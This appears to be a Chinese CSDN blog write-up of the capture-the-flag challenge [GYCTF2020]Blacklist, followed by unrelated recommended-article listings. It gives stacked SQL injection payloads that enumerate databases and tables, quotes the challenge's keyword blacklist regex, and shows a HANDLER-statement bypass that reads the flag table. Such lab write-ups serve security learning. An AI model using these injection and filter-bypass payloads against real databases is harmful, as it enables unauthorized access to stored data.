[GYCTF2020]Blacklist

最新推荐文章于 2024-10-09 17:55:30 发布
最新推荐文章于 2024-10-09 17:55:30 发布
阅读量192 收藏 5
点赞数 4
分类专栏: 网络安全 buuctf 文章标签: 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65279640/article/details/138001050
版权

打开题目,看到是

应该又是sql注入,开始进行判断闭合符号,输入'发现出现。

那么闭合符号大概率就是 ' 了

解这尝试了正常解法,发现都不能解出。之后尝试使用堆叠。

输入

1';show databases;

出现

那么使用来查询都有哪些表

1';show tables;

发现有FlagHere,flag大概率在这里,之后使用

1';show columns from FlagHere;

出现

 

flag果然在这里,之后再使用

1';select * fron FlagHere;

来找flag字段值,但是出现了

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

看来把很多东西都过滤了。

之后使用AI来搜寻可以实现与select相同作用的命令,找到了一个名为HANDLER的命令

之后将这几条语句进行堆叠,成功得到flag。

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;

以下我总结了一篇关于HANDLER命令使用的文章,有兴趣的可以看一下

MySQL HANDLER命令:一种独特的表数据访问方式-CSDN博客

masa010
关注
专栏目录
android_system_blacklist_android_msm8610_
10-03
在Android系统中,"android_system_blacklist_android_msm8610_"可能指的是针对特定硬件平台MSM8610的黑名单配置或者安全更新。MSM8610是高通公司生产的一款移动处理器,主要面向中低端智能手机和平板电脑市场。这个...
blacklist-jee
07-08
blacklist-jee 您将需要 Java8 来编译和运行。 检查您的应用程序是否正在运行在安装了 git、java8、docker 和 maven 的本地 Ubuntu VM 中进行开发先决条件:已安装 VirtualBox 和 Vagrant。 从该项目的根目录初始化...
Mikrotik-Blacklist
03-05
/tool fetch address=raw.githubusercontent.com host=raw.githubusercontent.com mode=https src-path=stathis/Mikrotik-Blacklist/master/a_blacklist_file.rsc/import a_blacklist_File.rsc其他资讯此回购应该...
Quick-Blacklist
06-15
快速黑名单 一个轻量级实用程序,用于将玩家和库存中的项目列入黑名单。
cpf_blacklist
02-08
项目名为"cpf_blacklist-master"暗示这是一个主分支或主要版本,可能包含源代码、测试文件、文档和其他资源。 以下是围绕这个主题可能涉及的一些详细知识点: 1. **字符串操作**:在Python中,CPF号码通常以特定...
鲁班到家上门安装维修系统源码开发之结构功能解析
weixin_43744973的博客
10-08 916
鲁班到家上门安装维修系统的源码开发是一个复杂但富有成效的过程。通过详细的需求分析、技术选型、功能模块设计以及前后端分离开发,该系统不仅提升了服务效率,还通过数字化管理优化了用户体验。未来,该系统有望在智能家居售后服务领域发挥更加重要的作用,引领行业向更加高效、专业、透明的方向发展。
Ubuntu有关redis的命令
weixin_53717695的博客
10-06 275
Ubuntu有关redis的命令
ATAM需求说明-系统架构师(七十六)
ke1ying的博客
10-08 859
1体系结构权衡分析法ATAM(Architecture Trade Off Analyzer Method)是一种常见的结构权衡分析法,该框架主要关注系统的(),针对性能、安全性、可用性和可修改性,在系统开发前进行分析、评价和这种。A共享数据库的集成方式通常将应用程序的数据存储在一个共享数据库中,通过制定统一的数据库模式来处理不同应用集成需求。场景和需求的收集,架构视图和场景的实现,属性模型的构造和分析,架构评价和折中。7企业信息资源集成管理的前提是对企业()的集成,其核心是对企业()的集成。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
qq 117791303
10-02 353
Wintergrasp 冬拥湖 120 VS 120
应对Redis大Key挑战:从原理到实现
欢迎来到【技术拾光者】,在这里,我们专注分享编程教程、技术趋势、实战案例和优质资源。不定期举办技术问答、专家访谈和职业指导。加入我们,共同探索技术世界,提升技能,拓展职业道路!
10-09 942
在使用Redis时,大Key问题会导致性能下降、内存消耗过多等问题。本文详细探讨了大Key问题的成因、影响及解决方案。大Key问题通常由大字符串、大集合或大对象引起,影响系统的内存使用和响应时间。通过拆分大Key、分页读取、异步删除和监控预警等方法,可以有效解决大Key问题。文章提供了Java示例代码,展示如何处理和优化Redis中的大Key问题,包括手动拆分大Key、分页读取大集合和异步删除大Key等。通过这些方法,开发者可以显著提升Redis的性能和稳定性。
同城O2O系统源码与跑腿配送平台的架构设计与开发方案详解
meihusdk的博客
10-08 429
同城O2O系统与跑腿配送平台的开发,既是技术的挑战,也是商业机会的探索。通过合理的架构设计与清晰的开发方案,开发者可以构建出高效、稳定且易于扩展的平台,为用户提供更为便捷的服务。
思迅商云开启货号修改语句
xushugang007的博客
10-03 242
insert into t_sys_system (sys_var_id,sys_var_name,sys_var_value,is_changed,sys_ver_flag) values('itemnoisedit','货号、供应商、客户编码修改','1','否','1')use hbposv10 --分店数据库名改成: hbposv10_branch。--开启 货号、供应商、客户编码修改。
一个真实可用的登录界面!
Q_w7742的博客
10-05 4237
至此,所有的代码运行之后应该可以实现输入账号密码,与数据库比对,重定向到欢迎界面这样的过程,可以将这个代码放在任何一个需要登录的网页中(自夸一下),当然还有很多很多的内容需要补充,留给你们自己发挥~这里如果php.ini设置不好可能会出现问题,找不到mysqli这个拓展,需要手动处理一下,当然这里不赘述。并且加密的过程被我注释掉了,防止新手搞不明白密码。首先需要一个静态网页,在前面已经讲了很多有关的代码,这里也是常规的,但是这里我们需要post到一个php页面,请注意。连接成功后,输入下面的代码,
2024最新 Navicat Premium 17 简体中文版安装图文详细教程
qq_25156781的博客
10-07 377
Navicat 17 引入了一系列新特性,旨在提升用户体验和工作效率。以下是一些值得关注的新功能:‌模型工作区的全面重新设计‌:包含了增强的图表设计、更强大的同步工具、数据字典支持等多项功能。这有助于在一个工作区中创建多个模型,使在单个图表中说明不同的模型对象成为可能,从而简化了复杂系统的浏览和理解‌。‌数据剖析‌:数据查看器现在集成了数据分析工具,为数据提供了一个可视化且全面的视图,增强了数据的完整性‌。‌数据字典‌:为各种服务器平台中的数据库内的每个元素提供文档和描述。
古典舞在线交流:SpringBoot平台实现与优化
2401_85341950的博客
10-04 656
在这段时期里,我查找了很多相关的资料,查阅了很多Java的相关文献,结合自己的经验,设计了这个古典舞在线交流平台,虽然每个学期学校都会针对动手练习进行相应的课程设计,但是在古典舞在线交流平台的具体设计中还是遇到了一些小问题,但在不断的学习、研究中都将问题一一解决,在一一克服的过程中,我也得到了成长,知识和经验也得到了丰富,这对我来说是一笔巨大的财富。这次设计也大大提高了我的动手的能力,让我在学习中充分体会到了探索的乐趣,享受成功的创作过程,在本次设计过程中汲取的东西,是一笔宝贵的财富,让我受益匪浅。
【PostgreSQL】提高篇——深入讨论约束(如 NOT NULL、CHECK、FOREIGN KEY)的使用及其对数据完整性的影响
thinking_chou的专栏
10-02 824
约束在数据库设计中起着至关重要的作用。通过使用NOT NULLCHECK和约束,可以有效地维护数据完整性、实施业务规则、减少错误和提高性能。了解这些约束的使用和影响,可以帮助开发者设计出更健壮和可靠的数据库系统。
开源商城系统crmeb phpstudy安装配置
最新发布
lxyoucan的博客
10-09 780
我从官网摘点:CRMEB产品与服务CRMEB通过将CRM(客户关系管理)+EB(营销电商)提供深度结合,致力于为开发者提供全渠道多场景的高性能电商系统软件服务;40w+开发者的选择与信任,值得托付!电商领域全行业解决方案从移动社交电商到品牌连锁、跨境出海,构建全领域多渠道上线下智慧新零售体系;为企业提供B2B/B2C/O2O、连锁经营、自营/联营、供应商、跨境出海等多种业务模式应用场景数字化电商解决方案。
Spring Boot驱动的现代医院管理系统
2401_85761003的博客
10-07 1114
6、网络上的客户端和服务器可以用来编程任何独立的编程环境,也有中国,GB2312,BIG5,日文写作,一般基金,用于支持多国语言,并且可以嵌入在数据表和其他软件shift_jis访问柱可以用作的名称。2、支持多种操作系统AIX的,FreeBSD下,HP-UX,Linux和Mac OS中,Novell公司的Netware,OpenBSD系统,OS/2裹时,Solaris,Windows等。编程语言,如C, C ++,Python和Java的,的Perl,PHP,埃菲尔铁塔,Ruby和Tcl的。
工具按钮 QToolButton
sc_o_r_pio的博客
10-01 878
工具按钮常常用来显示图标,然后添加到工具栏中常用属性和方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值